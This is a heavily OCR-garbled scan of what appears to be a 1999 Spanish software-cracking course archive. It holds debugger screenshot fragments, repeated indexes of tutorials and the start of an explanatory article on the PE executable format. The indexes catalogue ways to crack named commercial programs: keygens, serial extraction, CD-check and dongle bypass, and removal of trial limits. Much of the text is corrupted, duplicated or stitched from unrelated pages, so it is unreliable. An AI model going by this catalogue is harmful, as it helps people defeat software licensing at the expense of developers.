BoundsChecker::BchkdInfo word 
d010:BC068688 6064 bBGa BBB BEBA 66B6 ABBR BABA BEA 
00190:EC008698 6666 6666 66 BEBA BEBA BBBE ABBA BABA 
d610:BCo6B86%40 BABA bBGO B6R B6bGA 666 ABBA BEBA BARA 
BBÍA: A: o a a 15151515] Hi (5151515151515) e, 
Áttr I KTI EB ProcCI« 
BBC 82747624 BOBBBaEaRn Made SystenmtB8> 
NP 0626 827473408 B0BABbBBa Wait SystemtB8> ] 
NP 0624 82746024 60BB4BbBaAn Wait Systen<B8> —— Thread window 
=5 BB28 827A6DAB BBBBABBA Running Systen<B8> 
BB2C 827A6B20 B0BBBBAA Wait SystemtB8> 
ilriver.cpp 
9874: Comments 
5: This routine is an part of the Driver::Works framework. 1t conforms 
to the system requirements for a drivers initial entry point. The 
driver writer implements member DriverEntry in the class derived from 
KDriver, and that member gets called teventually> from here. 


DBG 

¿¿ For debug builds, initialize the connection to BoundsChecker 
BoundsChecker::Init<DriverObject>; ” 
—— Code window 


ULONG InitializerCount = 8; 


“? call static initializers 
void (**p>void? = StartlnitCalls+1; 
na <p < EndIinitCalls> 


Gpo; 
p++; 
InitializerCount++; 


¡ED43FC9B 8B1AF7CB testdrv!DriverEntry+40B56 y 
'ED43FD58 8B1DBD23 ntoskrn1?_lopGetDriverNameFromKe yNo de +8477 —— Stack window 
ntosken1?_lopLoadUnloadDriver+BB55 
BC608DO8 Pa ntosken11 ExplorkerT hread+B9C5 
PASSIVI KTEB<827AGDAB>—T1D<0828 > 
SB Iransaction Schedule for Host ais: Ba: 
Universal Host Controller at PCI Bus BM Device 31 Function 2 
SB schedule at 824EFO06B 


E —— Command window 


rame A at 824EFOBA 
Next Entry: M24E5DABM CUf:A Queue:1 T:B> 


SPD:B C_ERR:B LS:A 150: 1IOC:BM  ActLen:1 byt TM 
Status (Act:M Stalled:6 DBEr"r:AM Babble:b8 HR: a CRC/TMout :AM BitErr:B> 
z S E sec to cance , O 
| out SscCmOos com 
Windows* 95 


A A Windows* 98 
Windows* Me 
Windows NT? 
| Windows* 2000 
Windows' XP 


COMPRESION / DESCOMPRESION 

Code Snippet Creator v1.05: (W95/W98/NT) 

Descabezando archivos ejecutables portables 

Comprender la estructura y el contenido del encabezado de los 
archivos con formato PE 


Editor hexadecimal, ProcDump v1.5, 
Octubre de 1999 nuMIT_or [W32DASM32 8.93 y/o IDA PRO, 
EXeScope v4.40, Softlce (opcional) 


La Memoria en W32: Intro (W95/W98/NT) 


Suministrar conocimiento que permita comprender cómo W32 
traduce direcciones virtuales en direcciones físicas. 


Editor hexadecimal, ProcDump v1.5, 
W32DA5SM32 8.93 y/o IDA PRO, 
EXeScope v4.40 (opcional), Softlce 


Reversing with ToPo v1.0 (W95/W98/NT) 


Cómo usar ToPo v1.0 


| : Topo v1.0, Uedit y (opcionalmente) 
23/10/99 Mr.Crimson SoftICE 


[Descompresión manual con ProcDump (W95) 
¡Como usar el ProcDump para descomprimir/desencriptar tus cobayas. 
(31/08/99 Mr.Orange ¡Softlce v3.25, ProcDump 


Winboost 2000 v1.0.0.1999 (W95/W98/NT) 


Cómo saber si un programa esta comprimido. Uso del ProcDump. 
Cómo eliminar una "protección anti-desensamblado" 


¡Obtener un número de Serie Válido 

: ProcDump v1.5, Gettyp v2.38, 
Ú sd Me-Walle | rs2dasm 18:93. UltaEdit v6 104 
[WkT!] FAQ 


[12 [3] [WT] 1999 


Respuesta a las Preguntas típicas de Ingenieria Inversa 


>» 
Win 


Como Crackear por Estado+Porcino 


Como Crackear por O | 
Estado+Porcino. Capítulo 7 PLLIO PIS. 


Curso de CrAcKinG. 7) Desclavando cruces con o ose de Arimatea. 
-Como Crackear Ulead Media Studio Pro v5.01- ;- 


Como Crackear por AE " ¡0ñó 
Estado+Porcino. Capítulo 6 Aaa ROrDO! (HbIO 

Curso de CrAcKinG. 6) Desvirgando Expedientes X 

-Como Crackear Contaplus Elite Pyme- ;-?) 

Como Crackear por Meal dd 
Estado+Porcino. Capítulo 5 e A 
Curso de CrAcKinG. 5) Color Crack. (Quien dijo ke el amarillo daba 
mala suerte ;-?) 


Como Crackear por MER EOS 
Estado+Porcino. Capítulo 4 ai nds 
Curso de CrAcKinG. 4) Haciendo de Cerrajeros 


Como Crackear por. Mr Pink Mayo 1998 


Curso de CrAcKinG. 3) Corta Historia del Tiempo 


E a is 
Estado+Porcino. Capítulo2. [PLCTIT0O POS 


Curso de CrAcKinG. 2) Diseccionando a los Muertos 


Como Crackear por Estado+Porci Diciembre 1997 
Estado+Porcino. Capítulo 1 | a 


[Curso de CrAcKinG. 1) Orígenes 


¡SoftIce Debugger 


[Introducción al Softlce Mr.Brown [1998 
[Instalación y Consejos para iniciarse en el Debugger Softlce 


[Comandos del Softlce Mr.Brown 11998 
[Referéncia Resumen de los comandos disponibles en el Softlce 3.22 


[Uso de Breakpoints Mr.Brown 11998 
[Recomendaciones e Ideas sobre Puntos de Ruptura en el Softlce. 


Ingenieria Inversa Utilizando la función Mr. WhiTe (1999 
HMEMCPY Ae 


¿Qué es y cómo utilizar HMEMCPY? 


WEA 


[Visual Basic Cracking 


[Cuentapasos v3.75 (W95/W98/NT) 
¡Simular estar registrados. 


18/10/99 MéBIS Softlce v4.0, SmartCheck 
6.0, Spy++ 


[Advanced Video Poker v1.1 (W95) 


Buscar el número de serie y crear su Key-Generator 


14/08/99 Mr.GReeN E v6.01 (Build 


[Crackeando en VB [Esiel2 ¡Junio de 1999 


Este tutorial contiene lo basico a mi entender que debes saber de 
herramientas y de algunas funciones que tanto le gusta llamar al 
Visual Basic. 


[CuentaPasos v3.72 [Esiel2 (02/05/99 


Conseguir que no caduque nunca el programa. 


Funciones del Visual Basic 

E Mr.Brown 1998 

Listado de las funciones de msvbvm50.DLL, para tracear pgms de 
E 


Win 


UNIX Cracking 


Programas de Evaluación limitados por 
Fes Bart ¡Octubre 1998 


Cómo saltarse la protección de programas de evaluación. 


| Indice por Tipo de Protección 


Mochilas, Dongles, Hardware Key, .... 


[MatLab 5 (W95) 
¡Estudio y desprotección de la mochila. 
[Enero 98 |+Aitor ISoftlce 3.2, Wdasm 8.X, Editor Hexadecimal 


¡Cd-Checks, 20d 


[Commandos Behind the Enemy Lines (W95) 
[Evitar el Cd-Check. 


15/90/98  [Mr.Brown [SoftIce 3.22, IDA Pro 3.75, Editor 
Hexadecimal 


[NEED FOR SPEED 3 (W95) 
[Evitar el Cd-Check. 
107/06/99 [Mr.WhiTe ¡W32Dasm v8.9, Editor Hexadecimal 


>» 
we 


¡Generadores de Llaves, KeyMakers, .... 


[Lake Clear Animato v1.0c (W95/W98/NT) 
¡Obtención de un número de Serie Válido y creación de KeyMaker 
[21/ 10/99 [Mr.Green ¡Softlce v3.24 


[Productos RKS Software (W95) 
¡Obtención de un número de Serie Válido y creación de KeyMaker 
118/ 10/99 [Mr.Green ¡Softlce v3.24 


[File Compare Utility 3.0.002 (W95) 
[Hacer un Generador de claves (KeyGen). 
101/03/99 ¡Mr.Brown ¡Softlce 3.22, JavaScript 


[Revival 2.1 (W95) 
[Explicación para hacer un Generador de Llaves. 
¡Octubre 98 [Mr Pink ¡Softlce, IDA Pro 3.75, Compilador de C 


Win 


Shareware: Pantallas molestas (Nag Screens), .... 


[Ulead PhotolImpact v4.2 (W95) 
¡Conseguir que no caduque el programa y NagScreen. 


so 107/99 Mew EA v3.25, W32dasm v8.9, UltraEdit 


[Lotus SmartSuite Millenium Edition (W95) 
Conseguir que no caduque el programa y NagScreen. 


1 3/07/99 MrwaTe E v3.25, W32dasm v8.9, UltraEdit 


[CuentaPasos v3.72 (W95) 
¡Conseguir que no caduque el programa y NagScreen. 


02/05/99 [Esiel2 Softlce 3.22, Tasm 5.0, Process Patcher v 2.4 
(opcional). 


[PhotoLine 4.53 (W95) 
¡Conseguir que no caduque el programa y NagScreen. 
(20/ 11/98 [Mr.Grey ¡Softlce 3.24, Hex Workshop 2.54 


[TextPad 3.2.4 (W95) 
¡Saltarse el aviso inicial de shareware 
Julio 98 ¡Mr.Brown ¡Wdasm 8.9, Editor Hexadecimal 


[Logical (DOS) 
[Evitar la pantalla inicial de introducción de password. 
Julio 98 [Mr.Brown ¡SoftIce 3.22, Editor Hexadecimal 


Shareware: Limitaciones de Funciones, .... 


[Ulead Video Studio v3.0 (W95) 

Conseguir que no caduque el programa, NagScreen y otras 
limitaciones 

14/09/99 [Mr.Orange [WkT!] ¡Softlce v3.25 


[English-Spanish Interpreter 2000 (W95) 
¡Conseguir que no caduque el programa y NagScreen. 
(25/08/99 [Mr.Crimson ¡Softlce v3.25, TechFacts 95 


¡Slim Show 3.1 (W95) 


'Q uitar las limitaciones de la versión Shareware. 


29/9/98 [Mr Pink Softlce 3.22, IDA Pro 3.75, Editor 
Hexadecimal 


[Backgammon Pro (W95) 
¡Quitar límite de partidas para la versión shareware 
J ulio 98 [Mr.Brown ¡Softlce 3.22, Editor Hexadecimal 


Shareware: Buscar Números de Registro, Serials, .... 


Winboost 2000 v1.0.0.1999 (W95/W98/NT) 


Obtener un número de Serie Válido 


: ProcDump v1.5, Gettyp v2.38, W32dasm 
Ú id MrwaiTe e UltraEdit v6.10a 


Kyodai v10.21 (W95/W98/NT) 


Obtener un número de Serie Válido 


17/10/99 mo 


WinGest v3.5 (W95/W98/NT) 


ProcDump v1.50, Gettyp for Dos v2.35, 
Softlce v3.24, W32dasm v8.93, UltraEdit 
v6.10a 


Obtención de un número de Serie Válido 


107/07/99 [XASX ¡Softlce 939.23 


Advanced Video Poker v1.1 (W95) 


Buscar el número de serie y crear su Key-Generator 


14/08/99 [Mr.GReeN ¡Smartcheck v6.01 (Build 952) 


Exploit Submission Wizard 5 (W95) 


Conseguir la clave para registrarse. 


101/06/99 [Esiel2 ¡Softlce v3.24 


[Talisman 1.1 (W95) 
¡Conseguir la clave para registrarse. 
[11/5/99 ¡Mr.WhiTe ¡SoftIce 3.24 


[Picture Explorer 1.21 (W95) 
¡Conseguir la clave para registrarse. 
109/01/99 [Mr.Grey ¡Wdasm 


[KAWA 3.13 (W95) 
¡Conseguir la clave para registrarse. 
109/01/99 [Mr.Grey ¡Softlce 3.24 


Java Script It ! v1.3 (W95) 


[Conseguir la clave para registrarse. 
107/01/99 [Esiel2 ¡SoftIce v3.24 


[Cover Your Tracks 3.1 (W95) 
¡Conseguir la clave para registrarse. 
(20/ 12/98 [Mr.Grey ¡Softlce 3.24 


[AddSoft 2.26 (W95) 
¡Conseguir la clave para registrarse. 
(20/ 12/98 [Mr.Grey ¡Softlce 3.24, Hex Workshop 2.54 


Uninstall Manager 2.60 (W95) 
¡Conseguir la clave para registrarse. 
(20/ 11/98 [Mr.Grey ¡SoftIce 3.24 


[CaseLinr 5.4 (W95) 
¡Conseguir la clave para registrarse. 
108/ 11/98 [Mr.Grey ¡Softlce 3.24 


[AScreens 1.27 (W95) 
¡Conseguir la clave para registrarse. 
[251 10/98 [Mr.Grey ¡Softlce 3.24 


[AxMan 2.21 (W95) 
¡Conseguir la clave para registrarse. 
(25/ 10/98 [Mr.Grey ¡SoftIce 3.24 


[A-X.E. 2.0) (W95) 
¡Conseguir la clave para registrarse. 
118/ 10/98 [Mr.Grey ¡Softlce 3.24 


[DI Show 3.7 (W95) 
¡Conseguir la clave para registrarse. 
118/ 10/98 [Mr.Grey ¡Softlce 3.24 


Font Look 3.2, Directory Printer 1.8, Super Text Search 1.6 
E ) 


¡Conseguir la clave para registrarse. 
15/8/98 ¡Mr.Brown ¡SoftIce IZ 


[Internet Organizer 3.1 (W95) 
¡Conseguir la clave para registrarse. 
Julio 98 [Mr.Brown ¡Wdasm 8.9 


[Submission Wizard 4 (W95) 
¡Conseguir la clave para registrarse. 
Julio 98 [Mr.Brown ¡Softlce 3,22 


[Html Validator v2.55 (W95) 
¡Conseguir la clave para registrarse. 
Julio 98 ¡Mr.Brown ¡SoftIce 2 


[Norton CrashGuard Deluxe 3.0 (W95) 


Conseguir la clave para registrarse. Protección Cinderella, "Turnkey 
Popper” basada en la librería RSAGNT32.DLL 

[Mayo 98 [Estado+Porcino ¡Wdasm 8.X , Softlce 

[Uedit 5.0 (W95) 


¡Conseguir la clave para registrarse. 
[Enero 98 [Estado+Porcino ¡Wdasm 8.X , Softlce 


Shareware: Engañar el registro, Serial, .... 


[Quick Heal v5.20 (W95/W98/NT) 
¡Simular estar registrados. 
113/ 10/99 Kolgado ¡Softlce v4.01 


Toggle Mouse v3.4.3 (W95/W98/NT) 


Cracking: Primeros pasos. Conocimientos básicos de ensamblador. El 
registro de Windows. 


¡Simular estar registrados. 
25/08/99 Maniac PC W32dasm v8., UltraEdit v6.10a, 
Registry Monitor 


[Registry Studio V1.01 (W95/W98/NT) 
¡Simular estar registrados. 


Softlce v4, W32dasm v8.9, 
20/1059 Barpota a HEX (A tu Gusto ) 
[TogglePopDesk v1.1A (W95) 


¡Simular estar registrados y obtener un número de Serie Válido 
107/09/99 Mr.WhiTe ¡W32dasm v8.93, UltraEdit v6.10a 


[TogglePing+ v1.1A (W95) 
¡Simular estar registrados y obtener un número de Serie Válido 


107/09/99 Mr.WhiTe ¡W32dasm v8.93, UltraEdit v6.10a 


[Ultraedit v6.10a (W95) 
¡Simular estar registrado. 


| ] de v3.24, W32dasm v8.9, 
15/07/99 Mr.WhiTe UltraEdit v5.0a 
[CdrLabel 4.1 (W95) 


¡Simular estar registrado. 
[15/ 8/98 Mr.Brown ¡Softlce 3.22, Editor Hexadecimal 


[SemPoint 2.25 (W95) 
¡Simular estar registrado. 
113/ 8/98 Mr.Brown ¡Softlce 3.22, Editor Hexadecimal 


[Hex WorkShop 2.51 (W95) 
¡Saltarse el registro. 
J ulio 98 Daniel ¡Wdasm, Editor Hexadecimal 


[Quick View plus 4.0 (W95) 
¡Saltarse el registro. 
y ulio 98 Daniel ¡Wdasm, Editor Hexadecimal 


[WinRAR 2.04 (W95) 
¡Simular estar registrado. 
y ulio 98 Mr.Brown ¡Softlce 3.22, Editor Hexadecimal 


[TechFacts 95 (W95) 
¡Simular estar registrado. 
[Diciembre 97  |Estado+Porcino ¡SoftIce 3.0, Editor Hexadecimal 


Shareware: Limitaciones de Tiempo, .... 


[Cabinet Manager 98 2.0 (W95) 
¡Conseguir que no caduque nunca el programa. 
108/ 11/98 ¡Mr.Grey ¡SoftIce 3.24, Hex Workshop 2.54 


> 
hi 


Shareware: Zen Cracking, .... 
[Ulead Media Studio Pro v5.01 (W95) 


Conseguir que no caduque el programa, NagScreen y eliminar una X 
muy molesta. 

. Softlce v3.25, Referencia 
210959 Estado+Porcino API32 


[Multimedia Builder 3.0 (W95) 
¡Observación de los colores para crackear ;-) 
¡Noviembre 98 [Mr Pink ¡Softlce 


Wen 
[ Plantilla en formato htm | Plantilla en 
formato zip ] 


> 
Wi 


| [ Entrada | Documentoz Genéricoz | WKT TEAM Main Site ] 
ll Todo el ECD | x Tipo de Protección | x Fecha de Publicación | x orden Alfabético ] 


[ActiveLock 1.5 y VBCodeLibrary 3.0.0 (W95) 
¡Conseguir la clave para registrarse. 
103/09/99 [Paco ¡Visual Basic 5+, Smartcheck 6 (opcional) 


[AddSoft 2.26 (W95) 
¡Conseguir la clave para registrarse. 
(20/ 12/98 [Mr.Grey ¡Softlce 3.24, Hex Workshop 2.54 


[Advanced Video Poker v1.1 (W95) 
Buscar el número de serie y crear su Key-Generator 
14/08/99 [Mr.GReeN ¡Smartcheck v6.01 (Build 952) 


[A.X.E. 2.0) (W95) 
¡Conseguir la clave para registrarse. 
118/ 10/98 [Mr.Grey ¡Softlce 3.24 


[AxMan 2.21 (W95) 


¡Conseguir la clave para registrarse. 
[25/ 10/98 [Mr.Grey ¡SoftIce 3.24 


[Backgammon Pro (W95) 
¡Quitar límite de partidas para la versión shareware 
Julio 98 [Mr.Brown ¡Softlce 3.22, Editor Hexadecimal 


[Cabinet Manager 98 2.0 (W95) 
¡Conseguir que no caduque nunca el programa. 
108/ 11/98 Mr.Grey  |Softlce 3.24, Hex Workshop 2.54 


[CaseLinr 5.4 (W95) 
¡Conseguir la clave para registrarse. 
108/ 11/98 Mr.Grey  |Softlce 3.24 


[CdrLabel 4.1 (W95) 
¡Simular estar registrado. 
[15/ 8/98 Mr.Brown ¡Softlce 3.22, Editor Hexadecimal 


Code Snippet Creator v1.05: (W95/W98/NT) 

Descabezando archivos ejecutables portables 

Comprender la estructura y el contenido del encabezado de los 
archivos con formato PE 


Editor hexadecimal, ProcDump v1.5, 
Octubre de 1999 ¡nuMIT_or ¡W32DA5SM32 8.93 y/o IDA PRO, 
EXeScope v4.40, Softlce (opcional) 


Commandos Behind the Enemy Lines (W95) 


Evitar el Cd-Check. 


15/9/98 Mr.Brown Softlce 3.22, IDA Pro 3.75, Editor 
Hexadecimal 


Cover Your Tracks 3.1 (W95) 


Conseguir la clave para registrarse. 


(20/ 12/98 Mr.Grey  |Softlce 3.24 


Cuentapasos v3.75 (W95/W98/NT) 


¡Simular estar registrados. 
118/ 10/99 Mr.Blue  |Softlce v4.0, SmartCheck 6.0, Spy++ 


[CuentaPasos v3.72 (W95) 
¡Conseguir que no caduque nunca el programa. 


02/05/99 Esiel2 Softlce 3.22, Tasm 5.0, Process Patcher 
v 2.4 (opcional). 


| D 
[Directory Printer 1.8 (W95) 


¡Conseguir la clave para registrarse. 
[5/8/98 Mr.Brown ¡Softlce 322 


[DI Show 3.7 (W95) 
¡Conseguir la clave para registrarse. 
| 18/10/98 Mr.Grey ¡Softlce 3.24 


| E 
[English-Spanish Interpreter 2000 (W95) 


¡Conseguir que no caduque el programa y NagScreen. 
(25/08/99 [Mr.Crimson ¡Softlce v3.25, TechFacts 95 


[Exploit Submission Wizard 5 (W95) 
Conseguir la clave para registrarse. 
101/06/99 [Esiel2 ¡SoftIce v3.24 


| F 
[File Compare Utility 3.0.002 (W95) 


[Hacer un Generador de claves (KeyGen). 
101/03/99 [Mr.Brown ¡Softlce 3.22, JavaScript 


[Font Look 3.2 (W95) 
¡Conseguir la clave para registrarse. 
15/8/98 [Mr Brown ¡Softlce Ed 


| H 
[Hex WorkShop 2.51 (W95) 


¡Saltarse el registro. 
y ulio 98 [Daniel Wdasm, Editor Hexadecimal 


[Html Validator v2.55 (W95) 
¡Conseguir la clave para registrarse. 
Julio 98 [Mr.Brown Softlce 3.22 


| I 
[Internet Organizer 3.1 (W95) 


¡Conseguir la clave para registrarse. 
Julio 98 [Mr.Brown ¡Wdasm 8.9 


o 


Java Script It ! v1.3 (W95) 
¡Conseguir la clave para registrarse. 
107/01/99 Esiel2 ¡Softlce v3.24 


Kyodai v10.21 (W95/W98/NT) 


Obtener un número de Serie Válido 


ProcDump v1.50, Gettyp for Dos v2.35, 
17/10/99 ¡Mr.WhiTe ¡Softlce v3.24, W32dasm v8.93, UltraEdit 
v6.10a 


KAWA 3.13 (W95) 


Conseguir la clave para registrarse. 


109/01/99 [Mr.Grey ¡Softlce 3.24 


L 


Lake Clear Animato v1.0c (W95/W98/NT) 


¡Obtención de un número de Serie Válido y creación de KeyMaker 
(21/10/99 [Mr.Green ¡Softlce v3.24 


[Logical (DOS) 
[Evitar la pantalla inicial de introducción de password. 
Julio 98 [Mr.Brown ¡Softlce 3.22, Editor Hexadecimal 


[Lotus SmartSuite Millenium Edition (W95) 
¡Conseguir que no caduque el programa y NagScreen. 


15/07/99 [Mr.WhiTe Softlce v3.25, W32dasm v8.9, UltraEdit 
v6.10a 
WEA 


| M 
[MatLab 5 (W95) 
¡Estudio y desprotección de la mochila. 


Enero 98 o Softlce 32, Wdasm 8.X, Editor 
Hexadecimal 
[Multimedia Builder 3.0 (W95) 


¡Observación de los colores para crackear ;-) 
¡Noviembre 98 |[Mr.Pink ¡Softlce 


[NEED FOR SPEED 3 (W95) 
[Evitar el Cd-Check. 


07/06/99 Mere Me aAenor 
Hexadecimal 

[Norton CrashGuard Deluxe 3.0 (W95) 

Conseguir la clave para registrarse. Protección Cinderella, "Turnkey 

Popper” basada en la librería RSAGNT32.DLL 


[Mayo 98 Estado+Porcino |'Wdasm 8.X , Softlce 


A 


[Particle Fire screensaver v1.la (W95) 
¡Conseguir la clave para registrarse. 


19/08/99 [Champion Softlce v4.00, Regmon, Hiew 6.04 (mASM32 
opcional) 


[Picture Explorer 1.21 (W95) 
¡Conseguir la clave para registrarse. 
109/01/99 [Mr.Grey ¡Wdasm 


[PhotoLine 4.53 (W95) 
¡Conseguir que no caduque el programa. 
(20/ 11/98 [Mr.Grey ¡Softlce 3.24, Hex Workshop 2.54 


| Q 
[Quick Heal v5.20 (W95/W98/NT) 


¡Simular estar registrados. 
| 13/10/99 Kolgado ¡Softlce v4.01 


[QuickView plus 4.0 (W95) 
¡Saltarse el registro. 
J ulio 98 Daniel ¡Wdasm, Editor Hexadecimal 


| R 
[Registry Studio V1.01 (W95/W98/NT) 
¡Simular estar registrados. 


Softlce v4, W32dasm v8.9, Heditor HEX (A 
so 10/99 Kamor S Gusto) 


[Revival 2.1 (W95) 
[Explicación para hacer un Generador de Llaves. 
¡Octubre 98 [Mr Pink [Softice, IDA Pro 3.75, Compilador de C 


[Productos RKS Software (W95) 
[Obtención de un número de Serie Válido y creación de KeyMaker 
18/10/99 [Mr.Green ¡Softlce v3.24 


| S 
¡SemPoint 2.25 (W95) 


¡Simular estar registrado. 
13/8/98 ¡Mr.Brown ¡Softlce 3.22, Editor Hexadecimal 


¡Slim Show 3.1 (W95) 
¡Quitar las limitaciones de la versión Shareware. 
(29/9/98 [Mr Pink ¡Softlce 3.22, IDA Pro 3.75, Editor Hexadecimal 


[Submission Wizard 4 (W95) 
¡Conseguir la clave para registrarse. 
Julio 98 ¡Mr.Brown ¡SoftIce 3,22 


[Super Text Search 1.6 (W95) 
¡Conseguir la clave para registrarse. 
[5/8/98 [Mr.Brown ¡Softlce 3,22 


Toggle Mouse v3.4.3 (W95/W98/NT) 
Cracking: Primeros pasos. Conocimientos básicos de ensamblador. El 
registro de Windows. 


¡Simular estar registrados. 


| | , a v8.9, UltraEdit 
cd Manto ee v6.10a, Registry Monitor 


[TogglePopDesk v1.1A (W95) 
¡Simular estar registrados y obtener un número de Serie Válido 


07/09/99 Mr.WhiTe W32dasm v8.93, UltraEdit 
v6.10a 


[TogglePing+ v1.1A (W95) 
¡Simular estar registrados y obtener un número de Serie Válido 


07/09/99 Mr.WhiTe W32dasm v8.93, UltraEdit 
v6.10a 


[Talisman v1.1 (W95) 
¡Conseguir la clave para registrarse. 
11/05/99 [Mr.WhiTe ¡Softlce 3.24 


[TechFacts 95 (W95) 
¡Simular estar registrado. 
[Diciembre 97 [Estado+Porcino ¡Softlce 3.0, Editor Hexadecimal 


[TextPad 3.2.4 (W95) 
¡Saltarse el aviso inicial de shareware 
Julio 98 [Mr.Brown ¡Wdasm 8.9, Editor Hexadecimal 


ME 


| U 
[Ulead Button.Applet 1.0 (W95) 


¡Conseguir que no caduque el programa y NagScreen. 
(31/08/99 Mr.Orange ¡Softlce v3.25, ProcDump 


[Ulead Media Studio Pro v5.01 (W95) 

Conseguir que no caduque el programa, NagScreen y eliminar una X 
muy molesta. 

(21/09/99 Estado+Porcino ¡Softlce v3.25, Referencia API32 


[Ulead Photolmpact v4.2 (W95) 
[Conseguir que no caduque el programa y NagScreen. 


. Softlce v3.25, W32dasm v8.9, 
2010799 Mr.WhiTe e dit v6.10a 
[Ulead Video Studio v3.0 (W95) 
Conseguir que no caduque el programa, NagScreen y otras 
limitaciones 
14/09/99 Mr.Orange [WkT!] ¡Softlce v3.25 


[Ultraedit v6.20b (W95) 
¡Simular estar registrado. 
(29/09/99 ADeeJay? ¡Softlce v3.24, W32dasm v8.9 


[Ultraedit v6.10a (W95) 
¡Simular estar registrado. 


. Softlce v3.24, W32dasm v8.9, 
150799 Mr.WhiTe e dit vs .0a 


[Ultraedit 5.0 (W95) 
¡Conseguir la clave para registrarse. 
[Enero 98  ¡Estado+Porcino ¡Wdasm 8.X , Softlce 


[Uninstall Manager 2.60 (W95) 


¡Conseguir la clave para registrarse. 
(20/ 11/98  |¡Mr.Grey ¡SoftIce 3.24 


[Winboost 2000 v1.0.0.1999 (W95/W98/NT) 
¡Obtener un número de Serie Válido 


a ProcDump v1.5, Gettyp v2.38, W32dasm 
Ú Ei MrwarTe dE UltraEdit v6.10a 
[WinGest v3.5 (W95/W98/NT) 


¡Obtención de un número de Serie Válido 
107/07/99 [XASX ¡Softlce v3.25 


[WinRAR 2.04 (W95) 
¡Simular estar registrado. 
Julio 98 ¡Mr.Brown ¡SoftIce 3.22, Editor Hexadecimal 


| 0, 1, 2, 3, 4, 5, 6, 7, 8, 9 


[AScreens 1.27 (W95) 
¡Conseguir la clave para registrarse. 
[251 10/98 Mr.Grey ¡Softlce 3.24 


[ Plantilla en formato htm | Plantilla en 
formato zip ] 
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Code Snippet Creator 1.05: 


Programa Descabezando archivos ejecutables portables W95 / W98 / NT 
Herramienta para crear recortes (snippets) de código a ser insertos en archivos 
Descripción 
a ARK — de formato PE y agregar funcionalidades. 
o Tipo Eje pq empaquetado 


Url http://www.wco.com/-micuan/Tools/snipc105.zip 
Protección Empaquetamiento de ejecutable con formato PE 
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Hex Workshop u otro buen editor hexdecimal. 


ProcDump v1.5 
Herramientas W32DASM32 8.93 y/o IDA PRO 


eXeScope v4.40 
Opcional: NotePad Softlce v3.0 o superior Oxígeno 


Comprender la estructura y el contenido del encabezado de los archivos con 
Objetivo 
formato PE 


[Cracker IA IA 


E — Octubre de 1999 


Ve 
Descabezando archivos ejecutables portables 


Introducción 


He tenido noticias de algunos interesados en conocer sobre un tema en el que he estado trabajando: el formato de los 
archivos ejecutables portables, conocidos como los "PE files". Como acostumbro a llevar notas de lo que hago, he 
reunido y ordenado este material esperando que pueda ser útil. No me responsabilizo del uso que hagan otros de él. 


PE es el formato adoptado por W32 (Windows a 32 bits) para sus archivos ejecutables (EXE), sus librerías dinámicas 


(DLL), dispositivos virtuales (VXD), etc. W32 adoptó este formato debido a las posibilidades que quedaban abiertas al 
implementar direcciones y punteros de 32 bits y debido al manejo de la memoria que estas posibilidades exigían. 


ALGO SOBRE MEMORIA VIRTUAL 


W32 implementa un manejo de memoria que supone paginación, dividide la memoria física en bloques de memoria fija 4 
KB llamados "páginas". Al proceso de dividir la memoria en páginas se llama paginación. Se trata de una técnica muy 
empleada en los sistemas operativos multitareas (capaces de ejecutar más de una tarea al mismo tiempo) para manejar la 
memoria dinámica del sistema (RAM = Randow Access Memory = Memoria de Acceso Aleatorio) de manera que 
ninguna tarea altere los datos de otra o la intervenga negativamente en su comportamiento. 


W32 emplea punteros y direcciones de 32 bits. Esto quiere decir que, si lo tuvieramos, podríamos usar una memoria de 
4GB para cada programa en ejecución. Pero aunque no tengamos todavía ships con esta capacidad de memoria, los 
programas en W32 corren como si la tuvieran a su disposición. El sistema W32 asigna a cada proceso o programa en 
ejecución un espacio de direcciones ficticio de 4GB, un montón de memoria que sólo existe imaginariamente, llamada 
"memoruia virtual". Luego, para ejecutar código del programa o disponer de sus datos, transforma, a través de un par de 
tablas, las direcciones ficticias en direcciones reales en la memoria física. 


Para comprender cómo W32 transforma direcciones virtuales en direcciones físicas para que el CPU pueda acceder a las 
instrucciones del programa montadas en la RAM, sugiero la lectura del artículo "La Memoria en W32: intro" que 


seguramente acompaña a este que lees ahora. 


El tema de la memoria virtual da para más y conviene tratarlo aparte. Ahora nos ocupan los PE. 
- 
Vi 


Teoría y un poco de práctica.. 


ARCHIVOS EN GENERAL Y EL FORMATO PE 


Un archivo no es más que un conjunto de datos organizados en varias entidades llamadas "registros". Un registro es lo 
que conocemos en programación como "estructura", es decir, un espacio en memoria que se emplea para guardar datos 
de manera ordenada. 


Una estructura se divide en entidades de tamaño definido destinadas a almacenar datos de justo ese tamaño. A cada una 
de estas "celdas" de la estructura la llamamos campos. 


Las estructuras o registros permiten almacenar información, en sus campos, sobre entidades particulares. En este sentido, 
la estructura es una colección de campos que pueden ser tratados como una unidad por algún programa. Es un bloque de 
datos organizado en campos sobre una entidad específica.Toda estructura posee un nombre que la identifica y permite 
localizarla o manejarla; este nombre es una varable del tipo de la estrcuctura que nombra y permite el tratamiento de las 
entidades de las cuales informa la estrcutura. 


Ahora bien, a la información contenida en un archivo se puede acceder de manera secuencial o directa. El modo 
secuencial es lento en muchos casos ya que se necesita revisar cada dato desde el comienzo del archivo con orden 
secuencial, hasta dar con el buscado. Por esto, la mayoría de las veces lo mejor es ir directamente al dato buscado, sin 
tener que revisar todos los campos del archivo. 


Para facilitar el acceso directo a los datos, se pueden colocar unos directorios al comienzo del archivo que indiquen 
dónde se encuentran ciertos tipos de datos. Los directorios son estructuras cuyos campos, llamados entradas del 
directorio, son tablas que tienen la misma estrcutura. Funcionan como un "directorio" telefónico. Si busco un dato de 
cierto tipo, reviso el directorio y veo dónde están agrupados esos datos. Luego voy a la sección donde se encuentran los 
datos de este tipo. Seguramente en esta sección habrá una tabla que me informe sobre lo que hay en ella. Reviso entonces 
esta tabla y con lo que me dice, busco el dato que me interesa: no tengo que ir dato por dato para encontrar lo que busco. 


Este es el principio a partir del cual se ideó el formato de los archivos PE, y facilitar el montaje del programa en la RAM: 
se coloca al principio del archivo una serie de estructuras que informan sobre el contenido del archivo. El contenido del 
archivo se divide en secciones cada una con datos de cierto tipo, formando el cuerpo del archivo. Las estructuras al 
comienzo del archivo forman el encabezado del archivo y nos dicen la dirección donde se ubica cada sección, su tamaño 
y sus atributos. A la vez, cada sección implementa tablas con información particular sobre el contenido de su cuerpo. 


Entonces, en los archivos con formato PE, tenemos un encabezado y un cuerpo. El encabezado de los archivos PE se 
subdivide en, podríamos decir, cuatro subencabezados: 


El encabezado DOS MZ 

El encabezado PE 

El encabezado NT opcional 

El conjunto de tablas de secciones 


